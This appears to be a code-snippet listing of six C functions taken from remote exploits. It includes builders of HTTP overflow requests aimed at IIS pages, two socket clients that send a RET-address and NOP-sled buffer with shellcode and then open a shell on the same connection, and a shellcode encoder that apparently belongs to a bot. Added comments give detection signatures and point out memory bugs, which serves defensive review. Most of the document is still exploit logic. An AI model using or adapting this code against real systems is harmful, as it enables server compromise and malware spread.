Ejemplo n.º 1
//*
/*
 * Test harness: calls GetShellcode() and then dumps sh_Buff/sh_Len with
 * PrintSc(). Both globals and both helpers are declared outside this
 * listing; sh_Buff/sh_Len are presumably filled in by GetShellcode()
 * (confirm against its definition).
 */
int main() {
    GetShellcode();
    PrintSc(sh_Buff, sh_Len);

    // Disabled on purpose: the two lines below would cast the data buffer
    // to a function pointer and jump into it. Running bytes out of a data
    // buffer is what non-executable data memory (DEP/NX) is meant to stop,
    // so keep this commented out and treat the output as data only.
    //void(*code)() = (void *)sh_Buff;
    //code();
}
Ejemplo n.º 2
/*
 * GetOverStr - assemble an HTTP GET request in `buffer` and return its length.
 *
 * buffer  : output. Receives the formatted request text (limited to BUFFSIZE
 *           by _snprintf) followed by `i` raw bytes copied from overbuff.
 * server  : value placed in the HOST header.
 * urlfile : request path; NULL selects the default "/iisstart.asp".
 * offset  : not used anywhere in this function.
 *
 * Returns j+i: the strlen() of the formatted text plus the byte count that
 * getoverbuff() reported.
 *
 * Defender view: the request this produces has a fixed "?!!ko" query string,
 * a Content-Type header value with a very long run of filler appended, and a
 * hard-coded Content-length of 2147506431, which is larger than a signed
 * 32-bit integer can hold. Each of these is anomalous for a GET and is a
 * usable signature for request filtering or log review.
 */
int  GetOverStr(char *buffer,char *server,char *urlfile,int offset)
{

  char    shellcodebuff[BUFFSIZE];
  char    overbuff[BUFFSIZE];
  int     i,j;

  char    *url="/iisstart.asp";

  // Format arguments, in order: url, server, shellcodebuff. The third %s sits
  // directly after the Content-Type value, so the filler ends up in that header.
  char    overstr[]="GET %s?!!ko HTTP/1.1\r\nHOST:%s\r\nContent-Type: application/x-www-form-urlencoded%s\r\nContent-length: 2147506431\r\n\r\n";

  if(urlfile!=NULL) url=urlfile;

  // Every byte of the array is set to '7', so there is no NUL terminator
  // in it at this point.
  memset(shellcodebuff,'7',BUFFSIZE);//NOPCODE,BUFFSIZE);
  i=getoverbuff(overbuff);
  // The value stored in j here is overwritten by the loop below and never read.
  j=GetShellcode(shellcodebuff+0x1000);
  // NOTE(review): strcat() appends at the first NUL it finds. After the memset
  // the only NUL can be one written by GetShellcode() at or after +0x1000; if
  // there is none, strcat() scans and writes beyond the array. The loop runs
  // 0x3801 times and appends 57348 bytes in total, and nothing checks that
  // this fits in BUFFSIZE (defined outside this listing).
  for(j=0;j<=0xe000;j+=4)
  {
      strcat(shellcodebuff,"\x41\x41\x41\x41"); 
  } 

  // NOTE(review): _snprintf() does not write a terminator when the output is
  // truncated at BUFFSIZE, so the strlen() on the next line can read past the
  // end of `buffer`.
  _snprintf(buffer,BUFFSIZE,overstr,url,server,shellcodebuff);
  j=strlen(buffer);
  // NOTE(review): unbounded append - the caller's buffer has to hold j+i bytes,
  // and no check against its real size is made here.
  memcpy(buffer+j,overbuff,i);
  return (j+i);
}
Ejemplo n.º 3
/*
 * GetOverStr - assemble an HTTP GET request in `buffer` and return its length.
 *
 * buffer  : output; written by _snprintf() with a limit of BUFFSIZE.
 * server  : value placed in the HOST header.
 * urlfile : request path; NULL selects the default "/default.asp".
 * offset2 : not used in this function (the body refers to `offset` instead).
 *
 * Returns strlen(buffer) after formatting.
 *
 * Defender view: the contents of overbuff are appended directly to the
 * request path, followed by the fixed query string "?koko". A request URI
 * carrying a long run of non-text bytes ahead of that marker is the artefact
 * to look for in web-server logs and request filters.
 */
int  GetOverStr(char *buffer,char *server,char *urlfile,int offset2)
{

  // findshellcodebuff and findshellbytes are only referenced by the
  // commented-out call below; they are otherwise unused.
  char    findshellcodebuff[BUFFSIZE];
  char    shellcodebuff[BUFFSIZE];
  char    overbuff[BUFFSIZE];
  int     i,findshellbytes,postbytes;

  char    *url="/default.asp";

  // Format arguments, in order: url, overbuff, server.
  char    overstr[]="GET %s%s?koko HTTP/1.1\r\nHOST:%s\r\nContent-Type: text/html\r\n\r\n";
 
  if(urlfile!=NULL) url=urlfile;

  // NOTE(review): `offset` is not a parameter or local here (the parameter is
  // named offset2), so this modifies a variable declared outside the function -
  // presumably a file-scope global; confirm. The adjusted value is not read
  // again inside this function.
  offset=offset-strlen(url)-4;

  // The count returned in i is not used below.
  i=getoverbuff(overbuff);
 // findshellbytes=GetFindShellcode(findshellcodebuff);
  postbytes=GetShellcode(shellcodebuff);
  // NOTE(review): no check that 0x730 + postbytes stays within BUFFSIZE.
  memcpy(overbuff+0x730,shellcodebuff,postbytes);

  // overbuff is consumed through %s, so it is read up to its first NUL byte;
  // nothing in this function guarantees one exists inside the array.
  // NOTE(review): _snprintf() leaves `buffer` unterminated on truncation,
  // which makes the strlen() in the return statement unsafe.
  _snprintf(buffer,BUFFSIZE,overstr,url,overbuff,server); //,i,overbuff); //,shellcodebuff);
 
 // strcpy(buffer+strlen(buffer)+1,shellcodebuff);

  return (strlen(buffer)); //+postbytes+1);
}
Ejemplo n.º 4
/*
 * Command-line client: connects to argv[1]:argv[2], sends one fixed 1024-byte
 * message built in Buff, sends one further byte with send() flag value 1, waits
 * a second and then hands the socket to shell().
 *
 * Make_Connection, GetShellcode, shell, sh_Buff, sh_Len and RET are all
 * declared outside this listing.
 *
 * Returns -1 on a usage error, connect failure or send failure.
 *
 * Defender view: on the wire this is a single 1024-byte message whose first
 * 92 bytes (assuming a 4-byte unsigned long) repeat one word, immediately
 * followed by a single byte 'I' sent as urgent data. That sequence against a
 * listening service is worth alerting on.
 */
int main(int argc, char *argv[]) { 
    unsigned char Buff[1024];
    unsigned char data;

    unsigned long *ps;
    // k is declared but never used.
    int s, i, k;

    if (argc < 3) {
        fprintf(stderr, "Usage: %s remote_ip remote_port\n", argv[0]);
        return -1;
    }

    // NOTE(review): atoi() gives no error indication for a non-numeric port.
    // The failure test below only catches a return value of 0; if
    // Make_Connection() reports failure with -1 it is missed - confirm its contract.
    s = Make_Connection(argv[1], atoi(argv[2]), 10);
    if (!s) {
        fprintf(stderr, "[-] Connect failed. \n");
        return -1;
    }

    GetShellcode();
    
    // Fill the whole buffer with the word 0x60000000.
    // NOTE(review): the loop count assumes sizeof(unsigned long) == 4. Where
    // unsigned long is 8 bytes, 256 stores cover 2048 bytes and run past Buff.
    // The cast from unsigned char[] to unsigned long * also assumes suitable
    // alignment.
    ps = (unsigned long *)Buff;
    for(i=0; i<sizeof(Buff)/4; i++)
    {
        *(ps++) = 0x60000000;
    }
    
    // Dead store: i is reassigned by the next for loop before it is read.
    i = sh_Len % 4;
    
    // Copy sh_Len bytes so that they end at the last byte of Buff.
    // NOTE(review): no check that sh_Len <= sizeof(Buff); a larger value makes
    // the index wrap and the copy land outside the array.
    memcpy(&Buff[sizeof(Buff) - sh_Len], sh_Buff, sh_Len);

    // Overwrite the start of the buffer with 23 copies of RET (92 bytes with a
    // 4-byte unsigned long; twice that with an 8-byte one).
    ps = (unsigned long *)Buff;
    for(i=0; i<92/4; i++)
    {
        *(ps++) = RET;
    }
    // NOTE(review): out-of-bounds write - valid indices end at sizeof(Buff)-1,
    // so this stores one byte past the end of the array (undefined behaviour).
    Buff[sizeof(Buff)] = 0;
    
    //PrintSc(Buff, sizeof(Buff));

    i = send(s, Buff, sizeof(Buff), 0);
    if (i <= 0) {
        // The socket is not closed on this path or the one below.
        fprintf(stderr, "[-] Send failed. \n");
        return -1;
    }

    // The flags argument is the literal 1, which is the value of MSG_OOB on
    // common socket APIs; the error message below also calls this OOB data.
    data='I';
    i = send(s, &data, 1, 1);
    if (i <= 0) {
        fprintf(stderr, "[-] Send OOB data failed. \n");
        return -1;
    }
    
    sleep (1);
    
    // shell() is defined elsewhere; it receives the already-connected socket.
    shell(s);
}
Ejemplo n.º 5
/*
 * GetRNS0TerminatedShellcode - build a payload with GetShellcode() and write
 * its EncodeRNS0() encoding into the caller's buffer.
 *
 * buffer      : destination for the encoded output.
 * buffersize  : capacity of `buffer`; also passed through to EncodeRNS0().
 * ownip       : forwarded unchanged to the size and build helpers.
 * botfilename : forwarded unchanged to the size and build helpers.
 *
 * Returns 0 when the size predicted by GetRNS0TerminatedShellcodeSize() is
 * larger than buffersize or larger than 65535; otherwise returns whatever
 * EncodeRNS0() returns.
 *
 * All helpers are defined outside this listing. The temporary buffer is
 * allocated and freed inside this function; the caller owns only `buffer`.
 */
DWORD GetRNS0TerminatedShellcode(char *buffer, DWORD buffersize, char *ownip, char *botfilename)
{
	// Size checks run before any allocation or write to `buffer`.
	DWORD RNS0TerminatedShellcodeSize = GetRNS0TerminatedShellcodeSize(ownip, botfilename);
	if (RNS0TerminatedShellcodeSize > buffersize) return 0;
	if (RNS0TerminatedShellcodeSize > 65535) return 0;

	// NOTE(review): the malloc() result is not checked before GetShellcode()
	// writes through it. GetShellcodeSize() is called twice with the same
	// arguments; the allocation is 257 bytes larger than the size passed to
	// GetShellcode(), and the reason for that margin is not shown here.
	char *Shellcode = (char *)malloc(GetShellcodeSize(ownip, botfilename)+257);
	DWORD ShellcodeSize = GetShellcode(Shellcode, GetShellcodeSize(ownip, botfilename), ownip, botfilename);
	// The predicted size is replaced by the encoder's return value.
	RNS0TerminatedShellcodeSize = EncodeRNS0(buffer, buffersize, Shellcode, ShellcodeSize);

	free(Shellcode);

	return RNS0TerminatedShellcodeSize;
}
Ejemplo n.º 6
/*
 * Command-line client: connects to argv[1]:argv[2], prints the payload with
 * PrintSc(), sends one fixed 1024-byte message built in Buff, sends one
 * further byte with send() flag value 1, waits a second and then hands the
 * socket to shell().
 *
 * Make_Connection, GetShellcode, PrintSc, shell, sh_Buff, sh_Len and RET are
 * all declared outside this listing.
 *
 * Returns -1 on a usage error, connect failure or send failure.
 *
 * Defender view: on the wire this is a single 1024-byte message that starts
 * with one repeated word (128 bytes, assuming a 4-byte unsigned long),
 * continues with a long run of 0x90 bytes, and is immediately followed by a
 * single byte 'I' sent as urgent data. Long 0x90 runs in traffic to a service
 * are a classic IDS signature.
 */
int main(int argc, char *argv[]) { 
    unsigned char Buff[1024];
    unsigned char data;
    
    unsigned long *ps;
    int s, i;
    
    if (argc < 3) {
        fprintf(stderr, "Usage: %s remote_ip remote_port\n", argv[0]);
        return -1;
    }

    // NOTE(review): atoi() gives no error indication for a non-numeric port.
    // The failure test below only catches a return value of 0; if
    // Make_Connection() reports failure with -1 it is missed - confirm its contract.
    s = Make_Connection(argv[1], atoi(argv[2]), 10);
    if (!s) {
        fprintf(stderr, "[-] Connect failed. \n");
        return -1;
    }

    GetShellcode();
    PrintSc(sh_Buff, sh_Len);

    // Pad the whole buffer with 0x90 (presumably x86 NOP filler).
    memset(Buff, 0x90, sizeof(Buff));
    // NOTE(review): strcpy() copies up to the first NUL in sh_Buff, not sh_Len
    // bytes. The destination offset leaves room for exactly sh_Len bytes plus
    // a terminator, so a source with no NUL inside that range is written past
    // the end of Buff, and an embedded NUL cuts the copy short. There is also
    // no check that sh_Len < sizeof(Buff). Buff is unsigned char while
    // strcpy() takes char *, so this relies on an implicit pointer conversion.
    strcpy(Buff + (sizeof(Buff) - sh_Len - 1), sh_Buff);

    // Overwrite the start of the buffer with 32 copies of RET.
    // NOTE(review): the count assumes sizeof(unsigned long) == 4; with an
    // 8-byte unsigned long this covers 256 bytes instead of 128. The cast
    // from unsigned char[] to unsigned long * also assumes suitable alignment.
    ps = (unsigned long *)Buff;
    for(i=0; i<128/4; i++)
    {
        *(ps++) = RET;
    }
    // In-bounds terminator on the last byte of the array.
    Buff[sizeof(Buff) - 1] = 0;
    
    i = send(s, Buff, sizeof(Buff), 0);
    if (i <= 0) {
        // The socket is not closed on this path or the one below.
        fprintf(stderr, "[-] Send failed. \n");
        return -1;
    }

    // The flags argument is the literal 1, which is the value of MSG_OOB on
    // common socket APIs; the error message below also calls this OOB data.
    data='I';
    i = send(s, &data, 1, 1);
    if (i <= 0) {
        fprintf(stderr, "[-] Send OOB data failed. \n");
        return -1;
    }

    sleep (1);

    // get shell use same socket
    shell(s);
    
}